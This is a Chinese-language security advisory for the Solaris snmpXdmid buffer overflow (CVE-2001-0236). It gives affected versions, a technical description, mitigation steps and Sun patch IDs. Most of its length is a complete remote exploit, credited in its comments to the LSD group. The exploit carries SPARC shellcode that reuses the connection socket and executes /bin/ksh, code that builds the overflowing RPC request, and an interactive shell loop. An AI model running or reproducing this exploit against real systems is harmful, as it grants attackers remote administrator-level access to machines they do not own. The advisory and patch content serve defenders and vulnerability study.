Solaris SNMP to DMI 映射守护程序snmpXdmid存在缓冲溢出漏洞发布时间:2001-03-16 更新时间:2001-03-16 严重程度:高 威胁程度:远程管理员权限 错误类型:边界检查错误 利用方式:服务器模式 BUGTRAQ ID:2417 CVE(CAN) ID:CVE-2001-0236 受影响系统 Solaris2.6,7,8详细描述 <RPC snmpXdmid> SNMP和DMI是远程管理协议,在Solaris上snmpXdmid映射守护程序用来 组合这两个协议。守护程序在处理'indication'中存在缓冲溢出,其中 这个'indication'是发送到RCP服务的1000249上。这个漏洞在Solaris 8 sun4u上测试,但是可能以前的版本也存在此问题如Solaris2.6,7。 The Desktop Management Interface (DMI) 是Desktop Management Task Force (DMTF) 设置的管理协议。更多的信息可在下面的地址查找:http://www.dmtf.org/。 SUN在Solaris2.6提供一个叫'dmid'的守护程序,后来SUN开发了这个基于SNMP和DMI的 守护程序:/usr/lib/dmi/snmpXdmid。这个程序一方面'snmpdx'使用DPI的协议来注 册自己为子代理(subagent),并使用UPD6500端口。另一方面,它'dmid'使用基于RPC 的协议DMI来注册自己,你可以在SOLARIS上发现RPC服务为1000249: ~> rpcinfo -p ... 100249 1 udp 32785 100249 1 tcp 32786 .. 这个服务是一个回调服务允许'dmid'报告事件给'snmpXdmid',这些事件称为 'indications',通过使用这个事件可以导致缓冲溢出。关于SDR格式用与'dmid' 守护程序通信的信息可以在SUN的SDK中找到: usr/include/dmi/common.h /usr/include/dmi/server.h /usr/include/dmi/ci_callback.h 另外,回调的格式你可以在下面的程序中找到: /opt/SUNWconn/sea/dmi/sample/miexample.h 在这种情况下,可以通过所有栏为空但indication的名字内容为about的世间 DmiComponentAdded将引发内存的溢出: =>[1] __align_cpy_1(0xfea0b590, 0xe15b4, 0x... [2] generateTrap(0xe0ae8, 0x0, 0x25438, 0x... [3] handle_CompLangGrpIndication(0x48400, 0xfea0bb70, 0x47b30,... [4] _dmicomponentadded_0x1_svc(0xfea0bb70, 0x49bb0, 0x... [5] dmi2_client_0x1(0x44a24, 0x24f58, 0x4443c, 0x... [6] _svc_prog_dispatch(0x2509c, 0x1, 0x0, 0xff21a... [7] svc_getreq_common(0xff21ebf0, 0x1, 0xff228778, 0x... [8] svc_getreq_poll(0x1, 0xb49d8, 0xff21ae30, 0x... [9] waitForIndication(0x48378, 0x1, 0x... 测试代码 /*## copyright LAST STAGE OF DELIRIUM mar 2001 poland *://lsd-pl.net/ #*/ /*## snmpXdmid #*/ /* as the final jump to the assembly code is made to the heap area, this code */ /* also works against machines with non-exec stack protection turned on */ /* due to large data transfers of about 128KB, the code may need some time to */ /* proceed, so be patient */ #include <sys/types.h> #include <sys/socket.h> #include <sys/time.h> #include <netinet/in.h> #include <rpc/rpc.h> #include <netdb.h> #include <unistd.h> #include <stdio.h> #include <errno.h> #define SNMPXDMID_PROG 100249 #define SNMPXDMID_VERS 0x1 #define SNMPXDMID_ADDCOMPONENT 0x101 char findsckcode[]= "\x20\xbf\xff\xff" /* bn,a <findsckcode-4> */ "\x20\xbf\xff\xff" /* bn,a <findsckcode> */ "\x7f\xff\xff\xff" /* call <findsckcode+4> */ "\x33\x02\x12\x34" "\xa0\x10\x20\xff" /* mov 0xff,%l0 */ "\xa2\x10\x20\x54" /* mov 0x54,%l1 */ "\xa4\x03\xff\xd0" /* add %o7,-48,%l2 */ "\xaa\x03\xe0\x28" /* add %o7,40,%l5 */ "\x81\xc5\x60\x08" /* jmp %l5+8 */ "\xc0\x2b\xe0\x04" /* stb %g0,[%o7+4] */ "\xe6\x03\xff\xd0" /* ld [%o7-48],%l3 */ "\xe8\x03\xe0\x04" /* ld [%o7+4],%l4 */ "\xa8\xa4\xc0\x14" /* subcc %l3,%l4,%l4 */ "\x02\xbf\xff\xfb" /* bz <findsckcode+32> */ "\xaa\x03\xe0\x5c" /* add %o7,92,%l5 */ "\xe2\x23\xff\xc4" /* st %l1,[%o7-60] */ "\xe2\x23\xff\xc8" /* st %l1,[%o7-56] */ "\xe4\x23\xff\xcc" /* st %l2,[%o7-52] */ "\x90\x04\x20\x01" /* add %l0,1,%o0 */ "\xa7\x2c\x60\x08" /* sll %l1,8,%l3 */ "\x92\x14\xe0\x91" /* or %l3,0x91,%o1 */ "\x94\x03\xff\xc4" /* add %o7,-60,%o2 */ "\x82\x10\x20\x36" /* mov 0x36,%g1 */ "\x91\xd0\x20\x08" /* ta 8 */ "\x1a\xbf\xff\xf1" /* bcc <findsckcode+36> */ "\xa0\xa4\x20\x01" /* deccc %l0 */ "\x12\xbf\xff\xf5" /* bne <findsckcode+60> */ "\xa6\x10\x20\x03" /* mov 0x03,%l3 */ "\x90\x04\x20\x02" /* add %l0,2,%o0 */ "\x92\x10\x20\x09" /* mov 0x09,%o1 */ "\x94\x04\xff\xff" /* add %l3,-1,%o2 */ "\x82\x10\x20\x3e" /* mov 0x3e,%g1 */ "\xa6\x84\xff\xff" /* addcc %l3,-1,%l3 */ "\x12\xbf\xff\xfb" /* bne <findsckcode+112> */ "\x91\xd0\x20\x08" /* ta 8 */ ; char shellcode[]= "\x20\xbf\xff\xff" /* bn,a <shellcode-4> */ "\x20\xbf\xff\xff" /* bn,a <shellcode> */ "\x7f\xff\xff\xff" /* call <shellcode+4> */ "\x90\x03\xe0\x20" /* add %o7,32,%o0 */ "\x92\x02\x20\x10" /* add %o0,16,%o1 */ "\xc0\x22\x20\x08" /* st %g0,[%o0+8] */ "\xd0\x22\x20\x10" /* st %o0,[%o0+16] */ "\xc0\x22\x20\x14" /* st %g0,[%o0+20] */ "\x82\x10\x20\x0b" /* mov 0x0b,%g1 */ "\x91\xd0\x20\x08" /* ta 8 */ "/bin/ksh" ; static char nop[]="\x80\x1c\x40\x11"; typedef struct{ struct{unsigned int len;char *val;}name; struct{unsigned int len;char *val;}pragma; }req_t; bool_t xdr_req(XDR *xdrs,req_t *objp){ char *v=NULL;unsigned long l=0;int b=1; if(!xdr_u_long(xdrs,&l)) return(FALSE); if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE); if(!xdr_bool(xdrs,&b)) return(FALSE); if(!xdr_u_long(xdrs,&l)) return(FALSE); if(!xdr_bool(xdrs,&b)) return(FALSE); if(!xdr_array(xdrs,&objp->name.val,&objp->name.len,~0,sizeof(char), (xdrproc_t)xdr_char)) return(FALSE); if(!xdr_bool(xdrs,&b)) return(FALSE); if(!xdr_array(xdrs,&objp->pragma.val,&objp->pragma.len,~0,sizeof(char), (xdrproc_t)xdr_char)) return(FALSE); if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE); if(!xdr_u_long(xdrs,&l)) return(FALSE); return(TRUE); } main(int argc,char **argv){ char buffer[140000],address[4],pch[4],*b; int i,c,n,vers=-1,port=0,sck; CLIENT *cl;enum clnt_stat stat; struct hostent *hp; struct sockaddr_in adr; struct timeval tm={10,0}; req_t req; printf("copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/\n"); printf("snmpXdmid for solaris 2.7 2.8 sparc\n\n"); if(argc<2){ printf("usage: %s address [-p port] -v 7|8\n",argv[0]); exit(-1); } while((c=getopt(argc-1,&argv[1],"p:v:"))!=-1){ switch(c){ case 'p': port=atoi(optarg);break; case 'v': vers=atoi(optarg); } } switch(vers){ case 7: *(unsigned int*)address=0x000b1868;break; case 8: *(unsigned int*)address=0x000cf2c0;break; default: exit(-1); } *(unsigned long*)pch=htonl(*(unsigned int*)address+32000); *(unsigned long*)address=htonl(*(unsigned int*)address+64000+32000); printf("adr=0x%08x timeout=%d ",ntohl(*(unsigned long*)address),tm.tv_sec); fflush(stdout); adr.sin_family=AF_INET; adr.sin_port=htons(port); if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if((hp=gethostbyname(argv[1]))==NULL){ errno=EADDRNOTAVAIL;perror("error");exit(-1); } memcpy(&adr.sin_addr.s_addr,hp->h_addr,4); } sck=RPC_ANYSOCK; if(!(cl=clnttcp_create(&adr,SNMPXDMID_PROG,SNMPXDMID_VERS,&sck,0,0))){ clnt_pcreateerror("error");exit(-1); } cl->cl_auth=authunix_create("localhost",0,0,0,NULL); i=sizeof(struct sockaddr_in); if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){ struct{unsigned int maxlen;unsigned int len;char *buf;}nb; ioctl(sck,(('S'<<8)|2),"sockmod"); nb.maxlen=0xffff; nb.len=sizeof(struct sockaddr_in);; nb.buf=(char*)&adr; ioctl(sck,(('T'<<8)|144),&nb); } n=ntohs(adr.sin_port); printf("port=%d connected! ",n);fflush(stdout); findsckcode[12+2]=(unsigned char)((n&0xff00)>>8); findsckcode[12+3]=(unsigned char)(n&0xff); b=&buffer[0]; for(i=0;i<1248;i++) *b++=pch[i%4]; for(i=0;i<352;i++) *b++=address[i%4]; *b=0; b=&buffer[10000]; for(i=0;i<64000;i++) *b++=0; for(i=0;i<64000-188;i++) *b++=nop[i%4]; for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i]; for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i]; *b=0; req.name.len=1200+400+4; req.name.val=&buffer[0]; req.pragma.len=128000+4; req.pragma.val=&buffer[10000]; stat=clnt_call(cl,SNMPXDMID_ADDCOMPONENT,xdr_req,&req,xdr_void,NULL,tm); if(stat==RPC_SUCCESS) {printf("\nerror: not vulnerable\n");exit(-1);} printf("sent!\n"); write(sck,"/bin/uname -a\n",14); while(1){ fd_set fds; FD_ZERO(&fds); FD_SET(0,&fds); FD_SET(sck,&fds); if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){ int cnt; char buf[1024]; if(FD_ISSET(0,&fds)){ if((cnt=read(0,buf,1024))<1){ if(errno==EWOULDBLOCK||errno==EAGAIN) continue; else break; } write(sck,buf,cnt); } if(FD_ISSET(sck,&fds)){ if((cnt=read(sck,buf,1024))<1){ if(errno==EWOULDBLOCK||errno==EAGAIN) continue; else break; } write(1,buf,cnt); } } } } 解决方案 可以通过关闭DMI来消除这个漏洞,你可以把/etc/rc?.d/S??dmi 改名 为 /etc/rc?.d/K07dmi 并'/etc/init.d/init.dmi stop' 。最好 把snmpXdmid的权限去除:chmod 000 /usr/lib/dmi/snmpXdmid。 补丁下载: SunOS 5.8 108869-07 SunOS 5.8_x86 108870-07 SunOS 5.7 107709-15 SunOS 5.7_x86 107710-15 SunOS 5.6 106787-15 SunOS 5.6_x86 106872-15 http://sunsolve.sun.com/pub-cgi/patchDownload.pl?target=<补丁ID>&method=h 相关信息 这个信息由Job de Haas (job@itsx.com)发现。 http://www.cert.org/advisories/CA-2001-05.html |
